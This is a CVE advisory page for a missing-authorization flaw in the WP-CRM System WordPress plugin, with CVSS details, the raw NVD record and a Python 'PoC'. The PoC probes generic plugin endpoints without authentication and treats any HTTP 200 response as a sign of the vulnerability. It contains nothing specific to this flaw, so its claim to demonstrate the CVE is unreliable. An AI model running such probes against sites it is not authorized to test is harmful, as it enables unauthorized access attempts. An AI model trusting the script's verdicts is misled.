Security Vulnerability Report
中文
CVE-2025-62740 CVSS 5.3 MEDIUM

CVE-2025-62740

Published: 2025-12-09 16:18:03
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Mario Peshev WP-CRM System wp-crm-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP-CRM System: from n/a through <= 3.4.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP-CRM System <= 3.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62740 PoC - WordPress WP-CRM System Missing Authorization import requests target_url = "http://target-wordpress-site.com" # Identify vulnerable endpoints (requires enumeration) # Common WP-CRM System endpoints that may lack authorization checks: vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wp-crm-system/v1/", "/wp-content/plugins/wp-crm-system/includes/" ] # Example: Direct access to admin functionality without authentication def check_vulnerability(): print("[*] Testing for CVE-2025-62740 - Missing Authorization in WP-CRM System") # Test unauthenticated access to protected functionality headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-62740-PoC)", "Content-Type": "application/x-www-form-urlencoded" } # Enumerate and test potential vulnerable endpoints for endpoint in vulnerable_endpoints: url = f"{target_url}{endpoint}" try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Potentially vulnerable endpoint found: {url}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)} bytes") # Check for sensitive data exposure if "user" in response.text.lower() or "email" in response.text.lower(): print("[!] Sensitive data may be exposed via this endpoint") except requests.RequestException as e: print(f"[-] Error testing {url}: {str(e)}") print("[*] PoC execution completed") print("[*] Manual verification recommended for confirmed exploitation") if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62740", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:02.890", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Mario Peshev WP-CRM System wp-crm-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP-CRM System: from n/a through <= 3.4.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-crm-system/vulnerability/wordpress-wp-crm-system-plugin-3-4-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}